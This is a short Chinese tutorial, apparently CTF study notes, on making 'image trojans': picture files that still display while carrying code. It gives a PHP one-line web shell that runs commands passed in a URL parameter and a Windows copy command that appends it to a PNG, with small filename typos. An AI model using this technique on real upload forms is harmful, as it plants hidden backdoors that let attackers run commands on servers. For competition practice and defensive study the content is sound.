前言
由于在比赛中经常用到图片木马,因此特意来学习一波。
0x01 什么是图片木马?
图片木马是一张能够显示又包含恶意代码(比如一句话木马)的图片文件。
根据定义我们知道图片木马有两个条件:
- 图片能够正常显示
- 包含能够执行的代码
总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。
常规的图片格式有gif,png,jpg格式
0x02 将恶意代码写在图片的尾部
适合格式:任何图片格式
方法一:copy法
准备一张正常的(a.png),新建一个文件内容写入以下代码(b.pbp)
1 | @eval($_GET['cmd']); |
使用下面的命令生成图片木马shell.png
1 | copy /b a.png + b.php/a = shell.png |
